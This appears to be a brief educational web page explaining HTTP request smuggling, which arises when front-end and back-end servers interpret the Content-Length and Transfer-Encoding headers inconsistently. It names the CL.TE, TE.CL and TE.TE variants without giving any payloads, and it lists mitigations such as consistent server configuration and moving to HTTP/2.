HTTP Request Smuggling

HTTP request smuggling is a technique that exploits discrepancies in how different servers or proxies interpret HTTP requests. This can lead to various security vulnerabilities, including unauthorized access, data leakage, and denial of service.

How it Works

The core of HTTP request smuggling lies in the inconsistent interpretation of request boundaries between the front-end and back-end servers. This usually involves manipulating headers like Content-Length and Transfer-Encoding.

Common Scenarios

Interactive Tool

Try our interactive HTTP Request Smuggling Analyzer to build and visualize how these attacks work.

Open HTTP Smuggling Analyzer

Mitigation

Mitigation strategies include:

Ensure consistent configuration between front-end and back-end servers.
Disable or carefully manage Transfer-Encoding.
Use HTTP/2, which eliminates ambiguity in request boundaries.
Regularly audit and patch your systems.

HTTP Request Smuggling

How it Works

Common Scenarios

CL.TE: Content-Length and Transfer-Encoding

TE.CL: Transfer-Encoding and Content-Length

TE.TE: Transfer-Encoding Smuggling

Interactive Tool

Mitigation